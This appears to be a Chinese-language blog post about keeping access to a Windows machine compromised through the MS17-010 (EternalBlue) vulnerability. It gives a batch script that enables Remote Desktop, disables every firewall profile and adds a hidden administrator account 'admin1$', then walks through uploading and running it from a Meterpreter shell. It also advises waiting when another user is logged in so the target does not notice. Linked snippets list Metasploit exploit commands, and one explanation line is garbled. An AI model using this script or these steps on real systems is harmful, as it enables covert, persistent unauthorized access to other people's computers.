[ windows权限维持 ] 利用永恒之蓝(MS17-010)漏洞取靶机权限并创建后门账户

最新推荐文章于 2024-12-03 15:44:59 发布
置顶 最新推荐文章于 2024-12-03 15:44:59 发布
阅读量2.3k 收藏 39
点赞数 82
分类专栏: 权限提升 文章标签: windows权限维持 永恒之蓝MS17-010 创建后门账户 网络 解决远程桌面安全登录框的问题 Windows留后门账号 开启3389端口
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/143351584
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

1 实验的的整体思路:

先通过漏洞拿到shell
接着通过shell上传脚本,脚本内容为开启远程桌面、关闭防火墙、创建隐藏账户
接着远程登录目标主机将创建的账户完全隐藏
通过上述步骤就可以再用户无感的情况下创建后门账户

1.1 按照正常流程拿到shell

限免有文章详细讲解了怎么通过 MS17-010 去拿shell这里就不详细讲了,先跳到下面文章拿到shell再跟着一步步网下进行实验。

[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
在这里插入图片描述

1.2 上传创建账号的脚本

1.2.1 脚本内容如下:

@echo off
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

netsh advfirewall set allprofiles state off
netsh advfirewall set publicprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set domainprofile state off

net user admin1$ admin1 /add
net localgroup administrators admin1$ /add

1.2.2 脚本解释

1.关闭回显

@echo off
关闭命令回显,使脚本运行时不显示每条命令本身,只显示输出结果

2.开启远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1:
使用WMIC(Windows Management Instrumentation Command-line)工具来允许远程桌面连接(Remote Desktop)
ServerName='%COMPUTERNAME%'
表示当前计算机名
call SetAllowTSConnections 1
调用方法以启用远程桌面连接
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f:
使用注册表编辑器(REG)添加或修改一个注册表项
HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server
指定要修改的注册表路径。
/v fDenyTSConnections指定要修改的值名称
/t REG_DWORD指定值的类型为DWORD
/d 00000000将该值设置为0(即禁用拒绝远程桌面连接)
/f强制覆盖现有的注册表项而不提示确认

3.关闭防火墙

netsh advfirewall set allprofiles state off:
使用Netsh命令关闭所有防火墙配置文件(域、专用、公用)
netsh advfirewall set publicprofile state off:
关闭公用配置文件的防火墙
netsh advfirewall set privateprofile state off:
关闭专用配置文件的防火墙
netsh advfirewall set domainprofile state off:
关闭域配置文件的防火墙

4.创建隐藏账户

net user admin1$ admin1 /add:
创建一个名为admin1 的用户,密码为 a d m i n 1 n e t l o c a l g r o u p a d m i n i s t r a t o r s a d m i n 1 的用户,密码为admin1 net localgroup administrators admin1 的用户,密码为admin1netlocalgroupadministratorsadmin1 /add:
将用户admin1$添加到本地管理员组中

1.2.3 上传脚本:

upload /root/3389_attack_user.bat C:\\

![

1.3进入shell执行脚本

进入shell环境并修改编码

shell
chcp 65001

chcp 是 “Change Code Page” 的缩写。
65001 是代码页编号,代表 UTF-8 编码。

在这里插入图片描述

查看我们上传的脚本:3389_attack_user.bat
因为我们上传到了 c 盘根目录,所以我们先 cd 到 c 盘,再 dir

cd C:\\
dir

在这里插入图片描述

查看当前拥有用户

net user

在这里插入图片描述

执行脚本

3389_attack_user.bat

在这里插入图片描述

确认用户创建成功
net user 查看,看不到,因为我们创建的是隐藏账户

在这里插入图片描述

但我们可以正常连接我们的目标系统,说明创建成功

在这里插入图片描述

1.4 登录上去之后立马将我们创建的用户完全隐藏

这个之前有文章写了,这里就不多讲了,步骤一摸一样

[ 应急响应基础篇 ] Windows系统隐藏账户详解(Windows留后门账号)

2 注意:如果连接时出现有用户正在连接先别远程

如果远程时出现了如下提醒,那就先不要远程登陆,先放着,防止目标用户发现
出现下面提示的原因是目标主机存在安全策略,只能登陆一个账户
提示:
登录消息:其他用户当前已登录到此计算机。如果继续,则该用户必须断开与此计算机的连接。是否继续?

在这里插入图片描述

当我们可以直接连上的时候立马修改目标系统的安全设置,修改为可以多个用户同时登陆就可以了,解决方案在之前文章就有写道,这里不详细讲了,直接跳到下面文章即可。

[ 问题解决篇 ] 解决远程桌面安全登录框的问题

相关资源

1、[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
2、[ 应急响应基础篇 ] Windows系统隐藏账户详解(Windows留后门账号)
3、[ 问题解决篇 ] 解决远程桌面安全登录框的问题
4、 各类问题解决杂记录
5、 应急响应入门到精通
6、[ 提升篇 ] 钓鱼实战系列
7、 vulnhub 综合靶场通关之路

Windows下的MS17-010永恒之蓝漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获Windows系统的最高权限。.........
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1305
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝利用Windows系统的SMB漏洞可以获系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝漏洞
ZXT02的博客
12-21 1519
仅限学习使用!!!
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 2999
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
永恒之蓝复现
最新发布
Deity0225的博客
12-03 291
使用 模块3 对目标主机进行扫描,我们可以利用options先看一下选项,RHOSTS为目标主机,利用set 命令设置,之后就可以run了。我们可以看到共扫到了4个存活主机,扫到192.168.233.131主机开启了139和445端口。网段扫描—>获IP—>漏洞扫描—>发现存在漏洞—>攻击拿shell—>提权。我们已经成功利用了此漏洞,截屏看一下对方主机限制界面,保存到了桌面。我们发现存在,ms17-010,进行exp。使用模块0,查看选项,设置RHOSTS。设置成功后,我们run。
梦开始的地方:ms17_010永恒之蓝
weixin_68989528的博客
02-01 193
MS17_010巨详细实验
永恒之蓝 利用(复现)
nszmsjhshs的博客
03-11 6693
永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 2105
利用window7存在的ms17-010漏洞进行复现演示
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
ms17-010 (永恒之蓝)漏洞复现及利用+Wireshark抓包分析
7Riven's blog
12-03 5980
1.实验环境 攻击机:Kali 1)攻击工具:msf 2)分析工具:wireshark 3)IP地址:192.168.109.154(自动获,NAT模式) 靶 机:Windows7 1)版本 2)开启网络共享(SMB协议) 3)关闭防火墙 4)IP地址:192.168.109.132(自动获,NAT模式) 2.测试攻击机与靶机的连通性 3.数据库配置...
MS17-010批量扫描器.zip
02-05
MS17-010批量扫描器,MS17-010MS17-010漏洞利用工具。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之蓝ms17010漏洞利用
l876460925的博客
10-13 3329
配置目标ip,本地ip利用exploit进行攻击 msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.3 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.2 msf6 exploit(windows/smb/ms17_010_
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2976
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
永恒之蓝漏洞利用MS17-010)获shell 及获靶机屏幕截图
沙罗沙罗的博客
05-09 4388
永恒之蓝漏洞利用MS17-101) 文章目录永恒之蓝漏洞利用MS17-101)一、永恒之蓝MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝MS17-101)介绍 漏洞名称:“永恒之蓝漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
qq_57163799的博客
08-22 2514
永恒之蓝漏洞利用方法结合msf工具的使用,简单快速理解永恒之蓝!!!
永恒之蓝利用流程及meterpreter的命令使用
L35052634的博客
08-11 1238
(编号0,exploit/windows/smb/ms17_010_eternalblue,为攻击模块,等下我们会使用这个模块进行攻击,编号3,auxiliary/scanner/smb/smb_ms17_010,为扫描模块,探测靶机是否存在该漏洞)第一步:切换为攻击模块(exploit/windows/smb/ms17_010_eternalblue),对其利用永恒之蓝”的漏洞,先使用。实验准备:攻击机IP:192.168.1.17靶机IP:192.168.1.9。
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`search ms17-010`。 3. 选择对应的漏洞模块,输入命令`use exploit/windows/smb/ms17_010_eternalblue`。 4. 设置目标IP地址,输入命令`set RHOSTS <目标IP地址>`。 5. 设置攻击机监听的IP地址和端口号,输入命令`set LHOST <攻击机IP地址>`和`set LPORT <监听端口号>`。 6. 运行漏洞模块,输入命令`exploit`。 7. 如果攻击成功,将会创建一个会话,可以通过命令`sessions`查看当前会话列表。 8. 输入命令`sessions -i <会话ID>`进入会话,这样就可以执行一些命令,例如`sysinfo`查看目标系统信息,`shell`获一个交互式shell等。 需要注意的是,这是一种非常危险的行为,必须在合法的环境下使用,否则可能会对他人和自己造成严重的损失。建议在使用前仔细阅读Metasploit的文档和指南,遵守相关法律法规。
评论 29
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寒蝉听雨[原ID_PowerShell]

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值